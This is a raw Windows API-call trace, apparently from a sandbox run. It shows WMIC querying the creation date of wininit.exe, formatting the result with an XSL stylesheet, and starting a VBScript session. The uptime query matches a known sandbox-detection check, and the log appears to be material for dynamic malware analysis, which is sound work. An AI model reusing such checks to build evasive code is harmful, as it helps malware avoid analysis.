[0406.563] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.563] malloc (_Size=0x18) returned 0x2096e0
[0406.563] SysStringLen (param_1="") returned 0x0
[0406.563] SysStringLen (param_1="") returned 0x60
[0406.563] memcpy (in: _Dst=0x33fef8, _Src=0x270ac8, _Size=0x2 | out: _Dst=0x33fef8) returned 0x33fef8
[0406.563] memcpy (in: _Dst=0x33fef8, _Src=0x2c8f28, _Size=0xc2 | out: _Dst=0x33fef8) returned 0x33fef8
[0406.563] free (_Block=0x209040)
[0406.563] malloc (_Size=0x18) returned 0x209040
[0406.563] SysStringLen (param_1="") returned 0x60
[0406.563] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x23a
[0406.563] memcpy (in: _Dst=0x336a88, _Src=0x33fef8, _Size=0xc2 | out: _Dst=0x336a88) returned 0x336a88
[0406.564] memcpy (in: _Dst=0x336b48, _Src=0x3365f8, _Size=0x476 | out: _Dst=0x336b48) returned 0x336b48
[0406.564] free (_Block=0x2096e0)
[0406.564] WbemLocator:IUnknown:Release (This=0x2d6710) returned 0x0
[0406.566] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0406.566] malloc (_Size=0x18) returned 0x2096e0
[0406.566] SysStringLen (param_1="") returned 0x0
[0406.567] SysStringLen (param_1="20240119140101.223600+060") returned 0xc0
[0406.567] memcpy (in: _Dst=0x33f3e8, _Src=0x2bf728, _Size=0x2 | out: _Dst=0x33f3e8) returned 0x33f3e8
[0406.567] memcpy (in: _Dst=0x33f3e8, _Src=0x33fd58, _Size=0x182 | out: _Dst=0x33f3e8) returned 0x33f3e8
[0406.567] free (_Block=0x209560)
[0406.567] _kbhit () returned 0x0
[0406.570] malloc (_Size=0x18) returned 0x209560
[0406.570] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON") returned 0x29a
[0406.570] SysStringLen (param_1="20240119140101.223600+060") returned 0xc0
[0406.570] memcpy (in: _Dst=0x336fd8, _Src=0x336a88, _Size=0x536 | out: _Dst=0x336fd8) returned 0x336fd8
[0406.570] memcpy (in: _Dst=0x33750c, _Src=0x33f3e8, _Size=0x182 | out: _Dst=0x33750c) returned 0x33750c
[0406.570] free (_Block=0x209040)
[0406.570] malloc (_Size=0x18) returned 0x209040
[0406.570] malloc (_Size=0x18) returned 0x209740
[0406.570] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240119140101.223600+060") returned 0x35a
[0406.571] SysStringLen (param_1="") returned 0xa
[0406.571] memcpy (in: _Dst=0x3376a8, _Src=0x336fd8, _Size=0x6b6 | out: _Dst=0x3376a8) returned 0x3376a8
[0406.571] memcpy (in: _Dst=0x337d5c, _Src=0x334be8, _Size=0x16 | out: _Dst=0x337d5c) returned 0x337d5c
[0406.571] free (_Block=0x209560)
[0406.571] free (_Block=0x209040)
[0406.571] GetCurrentThreadId () returned 0xdf0
[0406.571] ??0CHString@@QEAA@PEBG@Z () returned 0x16f6a8
[0406.571] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16f6a8
[0406.571] lstrlenW (lpString="LIST") returned 4
[0406.571] lstrlenW (lpString="get") returned 3
[0406.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
[0406.572] lstrlenW (lpString="ASSOC") returned 5
[0406.572] lstrlenW (lpString="get") returned 3
[0406.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="ASSOC", cchCount2=5) returned 3
[0406.572] lstrlenW (lpString="GET") returned 3
[0406.572] lstrlenW (lpString="get") returned 3
[0406.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0406.572] malloc (_Size=0x20a) returned 0x20d710
[0406.572] GetSystemDirectoryW (in: lpBuffer=0x20d710, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0406.572] free (_Block=0x20d710)
[0406.573] malloc (_Size=0x18) returned 0x209040
[0406.573] malloc (_Size=0x18) returned 0x209560
[0406.573] malloc (_Size=0x18) returned 0x209580
[0406.573] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0406.573] SysStringLen (param_1="\\wbem\\") returned 0x6
[0406.573] memcpy (in: _Dst=0x2c68b8, _Src=0x2c62c8, _Size=0x28 | out: _Dst=0x2c68b8) returned 0x2c68b8
[0406.573] memcpy (in: _Dst=0x2c68de, _Src=0x334be8, _Size=0xe | out: _Dst=0x2c68de) returned 0x2c68de
[0406.573] free (_Block=0x209040)
[0406.573] free (_Block=0x209560)
[0406.573] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0406.574] free (_Block=0x209580)
[0406.574] malloc (_Size=0x18) returned 0x209580
[0406.574] malloc (_Size=0x18) returned 0x209560
[0406.574] malloc (_Size=0x18) returned 0x209040
[0406.574] malloc (_Size=0x18) returned 0x2095a0
[0406.574] malloc (_Size=0x18) returned 0x209680
[0406.574] malloc (_Size=0x18) returned 0x209720
[0406.574] lstrlenW (lpString="TABLE") returned 5
[0406.574] lstrlenW (lpString="CSV") returned 3
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="HFORM") returned 5
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="HTABLE") returned 6
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="LIST") returned 4
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.575] lstrlenW (lpString="MOF") returned 3
[0406.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="TABLE", cchCount2=5) returned 1
[0406.575] lstrlenW (lpString="TABLE") returned 5
[0406.576] lstrlenW (lpString="RAWXML") returned 6
[0406.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="TABLE", cchCount2=5) returned 1
[0406.576] lstrlenW (lpString="TABLE") returned 5
[0406.576] lstrlenW (lpString="TABLE") returned 5
[0406.576] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="TABLE", cchCount2=5) returned 2
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="hform.xsl") returned 0x9
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="htable.xsl") returned 0xa
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="csv.xsl") returned 0x7
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="mof.xsl") returned 0x7
[0406.576] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.576] SysStringLen (param_1="xml.xsl") returned 0x7
[0406.576] malloc (_Size=0x18) returned 0x209780
[0406.577] malloc (_Size=0x18) returned 0x209640
[0406.577] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0406.577] SysStringLen (param_1="\\") returned 0x1
[0406.577] memcpy (in: _Dst=0x2c68b8, _Src=0x2c62c8, _Size=0x34 | out: _Dst=0x2c68b8) returned 0x2c68b8
[0406.577] memcpy (in: _Dst=0x2c68ea, _Src=0x334c48, _Size=0x4 | out: _Dst=0x2c68ea) returned 0x2c68ea
[0406.577] free (_Block=0x209780)
[0406.577] malloc (_Size=0x18) returned 0x209780
[0406.577] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\\\") returned 0x1a
[0406.577] SysStringLen (param_1="texttable.xsl") returned 0xd
[0406.577] memcpy (in: _Dst=0x2ee888, _Src=0x2c68b8, _Size=0x36 | out: _Dst=0x2ee888) returned 0x2ee888
[0406.578] memcpy (in: _Dst=0x2ee8bc, _Src=0x2566c8, _Size=0x1c | out: _Dst=0x2ee8bc) returned 0x2ee8bc
[0406.578] free (_Block=0x209640)
[0406.578] CreateFileW (lpFileName="C:\\Windows\\system32\\wbem\\\\texttable.xsl" (normalized: "c:\\windows\\system32\\wbem\\texttable.xsl"), dwDesiredAccess=0x0, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c
[0406.578] CloseHandle (hObject=0x26c) returned 1
[0406.578] malloc (_Size=0x30) returned 0x2086c0
[0406.579] malloc (_Size=0x30) returned 0x208700
[0406.579] ??0CHString@@QEAA@PEBG@Z () returned 0x16f408
[0406.579] ?Right@CHString@@QEBA?AV1@H@Z () returned 0x16f400
[0406.579] ??0CHString@@QEAA@PEBG@Z () returned 0x16f458
[0406.579] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0
[0406.579] ??1CHString@@QEAA@XZ () returned 0x1
[0406.579] ??1CHString@@QEAA@XZ () returned 0x20015c007c0001
[0406.579] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0406.579] malloc (_Size=0x30) returned 0x208740
[0406.579] malloc (_Size=0x20) returned 0x20ceb0
[0406.579] malloc (_Size=0x30) returned 0x208780
[0406.580] free (_Block=0x208740)
[0406.580] free (_Block=0x208700)
[0406.580] free (_Block=0x2086c0)
[0406.580] free (_Block=0x209720)
[0406.580] free (_Block=0x209680)
[0406.580] free (_Block=0x2095a0)
[0406.580] free (_Block=0x209040)
[0406.580] free (_Block=0x209560)
[0406.580] free (_Block=0x209580)
[0406.580] GetCurrentThreadId () returned 0xdf0
[0406.581] ??0CHString@@QEAA@XZ () returned 0x16f4b0
[0406.581] CoCreateInstance (in: rclsid=0xffa37410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xffaa29e8 | out: ppv=0xffaa29e8*=0x21371d0) returned 0x0
[0406.584] FreeThreadedDOMDocument:IXMLDOMDocument:loadXML (in: This=0x21371d0, bstrXML=" PROCESS where name="wininit.exe" get creationdate Q9IATRKPRHroot\\cimv2root\\cliIMPERSONATEPKTPRIVACYms_409ENABLEOFFN/AOFFOFFSTDOUTN/AON20240119140101.223600+060", isSuccessful=0x16f494 | out: isSuccessful=0x16f494*=0xffff) returned 0x0
[0406.589] ??0CHString@@QEAA@XZ () returned 0x16f190
[0406.589] GetCurrentThreadId () returned 0xdf0
[0406.590] malloc (_Size=0x20) returned 0x20cee0
[0406.590] malloc (_Size=0x30) returned 0x2086c0
[0406.590] CoCreateInstance (in: rclsid=0xffa37420*(Data1=0x2933bf94, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa37400*(Data1=0x2933bf93, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f1a8 | out: ppv=0x16f1a8*=0x2137620) returned 0x0
[0406.600] CoCreateInstance (in: rclsid=0xffa37410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x15, riid=0xffa373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f1c0 | out: ppv=0x16f1c0*=0x213b330) returned 0x0
[0406.601] FreeThreadedDOMDocument:IXMLDOMDocument:put_async (This=0x213b330, async=0) returned 0x0
[0406.601] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\\\texttable.xsl") returned 0x4e
[0406.601] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x213b330, xmlSource=0x16f360*(varType=0x8, wReserved1=0x213, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\\\texttable.xsl", varVal2=0x0), isSuccessful=0x16f458 | out: isSuccessful=0x16f458*=0xffff) returned 0x0
[0406.608] XSLTemplate:IXSLTemplate:putref_stylesheet (This=0x2137620, stylesheet=0x213b330) returned 0x0
[0406.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16cfa0 | out: lpSystemTimeAsFileTime=0x16cfa0*(dwLowDateTime=0xa10cd60, dwHighDateTime=0x1dab599))
[0406.641] GetCurrentProcessId () returned 0xdec
[0406.641] GetCurrentThreadId () returned 0xdf0
[0406.641] GetTickCount () returned 0x142f311
[0406.641] QueryPerformanceCounter (in: lpPerformanceCount=0x16cfa8 | out: lpPerformanceCount=0x16cfa8*=2129397410358) returned 1
[0406.663] malloc (_Size=0x100) returned 0x20a7f0
[0406.664] __dllonexit () returned 0x7fef4afbfc0
[0406.664] __dllonexit () returned 0x7fef4afbfa8
[0406.664] __dllonexit () returned 0x7fef4afbfd4
[0406.666] GetUserDefaultLCID () returned 0x409
[0406.666] GetVersion () returned 0x1db10106
[0406.667] ??2@YAPEAX_K@Z () returned 0x20d710
[0406.668] ??2@YAPEAX_K@Z () returned 0x20e240
[0406.668] GetUserDefaultLCID () returned 0x409
[0406.669] GetACP () returned 0x4e4
[0406.669] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.672] GetCurrentThreadId () returned 0xdf0
[0406.672] ??2@YAPEAX_K@Z () returned 0x20d710
[0406.672] GetCurrentThreadId () returned 0xdf0
[0406.672] ??2@YAPEAX_K@Z () returned 0x20cf10
[0406.672] ??2@YAPEAX_K@Z () returned 0x208700
[0406.672] ??2@YAPEAX_K@Z () returned 0x20d7f0
[0406.672] ??2@YAPEAX_K@Z () returned 0x208740
[0406.673] GetCurrentThreadId () returned 0xdf0
[0406.673] ??2@YAPEAX_K@Z () returned 0x20d8c0
[0406.673] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0406.674] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x16ecb0, cchData=6 | out: lpLCData="1252") returned 5
[0406.674] IsValidCodePage (CodePage=0x4e4) returned 1
[0406.675] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdf10000
[0406.676] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoCreateInstance") returned 0x7fefdf37490
[0406.676] CoCreateInstance (in: rclsid=0x7fef4b4d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef4b4d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x20e588 | out: ppv=0x20e588*=0x2d91c0) returned 0x0
[0406.677] IUnknown:AddRef (This=0x2d91c0) returned 0x2
[0406.677] GetCurrentProcessId () returned 0xdec
[0406.677] GetCurrentThreadId () returned 0xdf0
[0406.677] GetTickCount () returned 0x142f340
[0406.677] ISystemDebugEventFire:BeginSession (This=0x2d91c0, guidSourceID=0x7fef4b4d5d8, strSessionName="VBScript:00003564:00003568:21164864") returned 0x0
[0406.677] DllRegisterServer () returned 0x0
[0406.678] GetCurrentThreadId () returned 0xdf0
[0406.678] realloc (_Block=0x0, _Size=0xc8) returned 0x20d950
[0406.678] memcpy (in: _Dst=0x20d950, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20d950) returned 0x20d950
[0406.679] memcpy (in: _Dst=0x20d960, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20d960) returned 0x20d960
[0406.679] memcpy (in: _Dst=0x20d966, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20d966) returned 0x20d966
[0406.679] ??2@YAPEAX_K@Z () returned 0x2087c0
[0406.679] malloc (_Size=0x1008) returned 0x20e5d0
[0406.679] ??2@YAPEAX_K@Z () returned 0x20f5e0
[0406.680] malloc (_Size=0x400) returned 0x20f770
[0406.680] malloc (_Size=0x108) returned 0x20a900
[0406.680] malloc (_Size=0x2008) returned 0x34dfd0
[0406.681] memcpy (in: _Dst=0x34e004, _Src=0x2146d12, _Size=0xc | out: _Dst=0x34e004) returned 0x34e004
[0406.681] memcpy (in: _Dst=0x34e044, _Src=0x2146d20, _Size=0x10 | out: _Dst=0x34e044) returned 0x34e044
[0406.681] memcpy (in: _Dst=0x34e08c, _Src=0x2146e30, _Size=0x6 | out: _Dst=0x34e08c) returned 0x34e08c
[0406.681] memcpy (in: _Dst=0x34e0c4, _Src=0x2146e38, _Size=0xa | out: _Dst=0x34e0c4) returned 0x34e0c4
[0406.681] memcpy (in: _Dst=0x34e104, _Src=0x2146e4c, _Size=0x10 | out: _Dst=0x34e104) returned 0x34e104
[0406.682] memcpy (in: _Dst=0x34e14c, _Src=0x2146e70, _Size=0xc | out: _Dst=0x34e14c) returned 0x34e14c
[0406.682] malloc (_Size=0x208) returned 0x20fb80
[0406.682] memcpy (in: _Dst=0x34e18c, _Src=0x2146e90, _Size=0x4 | out: _Dst=0x34e18c) returned 0x34e18c
[0406.682] memcpy (in: _Dst=0x34e1c4, _Src=0x2146ea8, _Size=0xa | out: _Dst=0x34e1c4) returned 0x34e1c4
[0406.682] memcpy (in: _Dst=0x34e204, _Src=0x2146ebc, _Size=0x10 | out: _Dst=0x34e204) returned 0x34e204
[0406.682] memcpy (in: _Dst=0x34e24c, _Src=0x2146ed6, _Size=0x12 | out: _Dst=0x34e24c) returned 0x34e24c
[0406.682] malloc (_Size=0x408) returned 0x34ffe0
[0406.683] memcpy (in: _Dst=0x34e294, _Src=0x2146f08, _Size=0x8 | out: _Dst=0x34e294) returned 0x34e294
[0406.683] memcpy (in: _Dst=0x34e2d4, _Src=0x2146f30, _Size=0x18 | out: _Dst=0x34e2d4) returned 0x34e2d4
[0406.683] memcpy (in: _Dst=0x34e324, _Src=0x2146f4a, _Size=0x10 | out: _Dst=0x34e324) returned 0x34e324
[0406.683] memcpy (in: _Dst=0x34e36c, _Src=0x2146f5c, _Size=0x18 | out: _Dst=0x34e36c) returned 0x34e36c
[0406.683] memcpy (in: _Dst=0x34e3bc, _Src=0x2146f76, _Size=0x2 | out: _Dst=0x34e3bc) returned 0x34e3bc
[0406.684] memcpy (in: _Dst=0x34e3f4, _Src=0x2146fc4, _Size=0x6 | out: _Dst=0x34e3f4) returned 0x34e3f4
[0406.684] malloc (_Size=0x808) returned 0x3503f0
[0406.684] memcpy (in: _Dst=0x34e42c, _Src=0x2146ff0, _Size=0xa | out: _Dst=0x34e42c) returned 0x34e42c
[0406.684] memcpy (in: _Dst=0x34e46c, _Src=0x2146ffc, _Size=0x8 | out: _Dst=0x34e46c) returned 0x34e46c
[0406.684] memcpy (in: _Dst=0x34e4ac, _Src=0x2147018, _Size=0x2 | out: _Dst=0x34e4ac) returned 0x34e4ac
[0406.684] memcpy (in: _Dst=0x34e4e4, _Src=0x214702c, _Size=0x8 | out: _Dst=0x34e4e4) returned 0x34e4e4
[0406.685] memcpy (in: _Dst=0x34e524, _Src=0x20f64c, _Size=0x20 | out: _Dst=0x34e524) returned 0x34e524
[0406.685] memcpy (in: _Dst=0x34e57c, _Src=0x214709c, _Size=0xa | out: _Dst=0x34e57c) returned 0x34e57c
[0406.685] memcpy (in: _Dst=0x34e5bc, _Src=0x21470b2, _Size=0x6 | out: _Dst=0x34e5bc) returned 0x34e5bc
[0406.686] memcpy (in: _Dst=0x34e5f4, _Src=0x21470f8, _Size=0x8 | out: _Dst=0x34e5f4) returned 0x34e5f4
[0406.686] memcpy (in: _Dst=0x34e634, _Src=0x214711a, _Size=0x8 | out: _Dst=0x34e634) returned 0x34e634
[0406.686] memcpy (in: _Dst=0x34e674, _Src=0x2147162, _Size=0x16 | out: _Dst=0x34e674) returned 0x34e674
[0406.687] malloc (_Size=0x1008) returned 0x350c00
[0406.687] memcpy (in: _Dst=0x34e6bc, _Src=0x2147218, _Size=0x12 | out: _Dst=0x34e6bc) returned 0x34e6bc
[0406.687] memcpy (in: _Dst=0x34e704, _Src=0x2147242, _Size=0xa | out: _Dst=0x34e704) returned 0x34e704
[0406.687] memcpy (in: _Dst=0x34e744, _Src=0x2147250, _Size=0x8 | out: _Dst=0x34e744) returned 0x34e744
[0406.687] memcpy (in: _Dst=0x34e784, _Src=0x2147262, _Size=0xe | out: _Dst=0x34e784) returned 0x34e784
[0406.687] memcpy (in: _Dst=0x34e7c4, _Src=0x214727a, _Size=0x4 | out: _Dst=0x34e7c4) returned 0x34e7c4
[0406.688] memcpy (in: _Dst=0x34e7fc, _Src=0x2147292, _Size=0x8 | out: _Dst=0x34e7fc) returned 0x34e7fc
[0406.688] memcpy (in: _Dst=0x34e83c, _Src=0x2147338, _Size=0x4 | out: _Dst=0x34e83c) returned 0x34e83c
[0406.689] memcpy (in: _Dst=0x34e874, _Src=0x214733e, _Size=0x14 | out: _Dst=0x34e874) returned 0x34e874
[0406.689] memcpy (in: _Dst=0x34e8bc, _Src=0x2147354, _Size=0x18 | out: _Dst=0x34e8bc) returned 0x34e8bc
[0406.689] memcpy (in: _Dst=0x34e90c, _Src=0x20f64c, _Size=0x8 | out: _Dst=0x34e90c) returned 0x34e90c
[0406.689] memcpy (in: _Dst=0x34e94c, _Src=0x214737e, _Size=0xa | out: _Dst=0x34e94c) returned 0x34e94c
[0406.689] memcpy (in: _Dst=0x34e98c, _Src=0x2147392, _Size=0x8 | out: _Dst=0x34e98c) returned 0x34e98c
[0406.690] memcpy (in: _Dst=0x34e9cc, _Src=0x2147502, _Size=0xe | out: _Dst=0x34e9cc) returned 0x34e9cc
[0406.690] memcpy (in: _Dst=0x34ea0c, _Src=0x2147518, _Size=0x10 | out: _Dst=0x34ea0c) returned 0x34ea0c
[0406.690] memcpy (in: _Dst=0x34ea54, _Src=0x20f64c, _Size=0x1c | out: _Dst=0x34ea54) returned 0x34ea54
[0406.691] memcpy (in: _Dst=0x34eaa4, _Src=0x2147574, _Size=0x1a | out: _Dst=0x34eaa4) returned 0x34eaa4
[0406.691] memcpy (in: _Dst=0x34eaf4, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34eaf4) returned 0x34eaf4
[0406.691] memcpy (in: _Dst=0x34eb2c, _Src=0x21475f2, _Size=0x14 | out: _Dst=0x34eb2c) returned 0x34eb2c
[0406.691] memcpy (in: _Dst=0x34eb74, _Src=0x2147608, _Size=0x14 | out: _Dst=0x34eb74) returned 0x34eb74
[0406.691] memcpy (in: _Dst=0x34ebbc, _Src=0x214761e, _Size=0xc | out: _Dst=0x34ebbc) returned 0x34ebbc
[0406.692] memcpy (in: _Dst=0x34ebfc, _Src=0x20f64c, _Size=0x8 | out: _Dst=0x34ebfc) returned 0x34ebfc
[0406.692] memcpy (in: _Dst=0x34ec3c, _Src=0x214769a, _Size=0x12 | out: _Dst=0x34ec3c) returned 0x34ec3c
[0406.692] memcpy (in: _Dst=0x34ec84, _Src=0x21476b2, _Size=0x6 | out: _Dst=0x34ec84) returned 0x34ec84
[0406.692] memcpy (in: _Dst=0x34ecbc, _Src=0x21476ba, _Size=0x8 | out: _Dst=0x34ecbc) returned 0x34ecbc
[0406.692] memcpy (in: _Dst=0x34ecfc, _Src=0x21476d0, _Size=0x4 | out: _Dst=0x34ecfc) returned 0x34ecfc
[0406.692] memcpy (in: _Dst=0x34ed34, _Src=0x20f64c, _Size=0xc | out: _Dst=0x34ed34) returned 0x34ed34
[0406.693] memcpy (in: _Dst=0x34ed74, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34ed74) returned 0x34ed74
[0406.693] malloc (_Size=0x2008) returned 0x351c10
[0406.693] memcpy (in: _Dst=0x34edac, _Src=0x21477e0, _Size=0x1c | out: _Dst=0x34edac) returned 0x34edac
[0406.693] memcpy (in: _Dst=0x34edfc, _Src=0x2147818, _Size=0xc | out: _Dst=0x34edfc) returned 0x34edfc
[0406.694] memcpy (in: _Dst=0x34ee3c, _Src=0x20f64c, _Size=0xc | out: _Dst=0x34ee3c) returned 0x34ee3c
[0406.694] memcpy (in: _Dst=0x34ee7c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34ee7c) returned 0x34ee7c
[0406.696] memcpy (in: _Dst=0x34eeb4, _Src=0x20f64c, _Size=0x4 | out: _Dst=0x34eeb4) returned 0x34eeb4
[0406.696] memcpy (in: _Dst=0x34eeec, _Src=0x2147ae0, _Size=0x8 | out: _Dst=0x34eeec) returned 0x34eeec
[0406.697] memcpy (in: _Dst=0x34ef2c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34ef2c) returned 0x34ef2c
[0406.697] memcpy (in: _Dst=0x34ef64, _Src=0x20f64c, _Size=0x24 | out: _Dst=0x34ef64) returned 0x34ef64
[0406.697] memcpy (in: _Dst=0x34efbc, _Src=0x2147bf4, _Size=0xc | out: _Dst=0x34efbc) returned 0x34efbc
[0406.697] memcpy (in: _Dst=0x34effc, _Src=0x2147c04, _Size=0x8 | out: _Dst=0x34effc) returned 0x34effc
[0406.697] memcpy (in: _Dst=0x34f03c, _Src=0x2147c10, _Size=0x10 | out: _Dst=0x34f03c) returned 0x34f03c
[0406.698] memcpy (in: _Dst=0x34f084, _Src=0x2147c24, _Size=0x1c | out: _Dst=0x34f084) returned 0x34f084
[0406.698] memcpy (in: _Dst=0x34f0d4, _Src=0x2147c44, _Size=0x1a | out: _Dst=0x34f0d4) returned 0x34f0d4
[0406.698] memcpy (in: _Dst=0x34f124, _Src=0x2147c62, _Size=0x16 | out: _Dst=0x34f124) returned 0x34f124
[0406.698] memcpy (in: _Dst=0x34f16c, _Src=0x2147c7c, _Size=0x14 | out: _Dst=0x34f16c) returned 0x34f16c
[0406.698] memcpy (in: _Dst=0x34f1b4, _Src=0x2147cc0, _Size=0x16 | out: _Dst=0x34f1b4) returned 0x34f1b4
[0406.698] memcpy (in: _Dst=0x34f1fc, _Src=0x20f64c, _Size=0x1e | out: _Dst=0x34f1fc) returned 0x34f1fc
[0406.698] memcpy (in: _Dst=0x34f24c, _Src=0x20f64c, _Size=0x20 | out: _Dst=0x34f24c) returned 0x34f24c
[0406.698] memcpy (in: _Dst=0x34f2a4, _Src=0x2147d78, _Size=0x6 | out: _Dst=0x34f2a4) returned 0x34f2a4
[0406.699] memcpy (in: _Dst=0x34f2dc, _Src=0x2147da0, _Size=0x20 | out: _Dst=0x34f2dc) returned 0x34f2dc
[0406.699] memcpy (in: _Dst=0x34f334, _Src=0x20f64c, _Size=0x8 | out: _Dst=0x34f334) returned 0x34f334
[0406.699] memcpy (in: _Dst=0x34f374, _Src=0x2147dde, _Size=0x6 | out: _Dst=0x34f374) returned 0x34f374
[0406.699] memcpy (in: _Dst=0x34f3ac, _Src=0x2147df8, _Size=0x4 | out: _Dst=0x34f3ac) returned 0x34f3ac
[0406.699] memcpy (in: _Dst=0x34f3e4, _Src=0x2147dfe, _Size=0xe | out: _Dst=0x34f3e4) returned 0x34f3e4
[0406.700] memcpy (in: _Dst=0x34f424, _Src=0x20f64c, _Size=0x4 | out: _Dst=0x34f424) returned 0x34f424
[0406.700] memcpy (in: _Dst=0x34f45c, _Src=0x2147e72, _Size=0x8 | out: _Dst=0x34f45c) returned 0x34f45c
[0406.700] memcpy (in: _Dst=0x34f49c, _Src=0x20f64c, _Size=0x24 | out: _Dst=0x34f49c) returned 0x34f49c
[0406.701] memcpy (in: _Dst=0x34f4f4, _Src=0x20f64c, _Size=0x12 | out: _Dst=0x34f4f4) returned 0x34f4f4
[0406.701] memcpy (in: _Dst=0x34f53c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34f53c) returned 0x34f53c
[0406.702] memcpy (in: _Dst=0x34f574, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34f574) returned 0x34f574
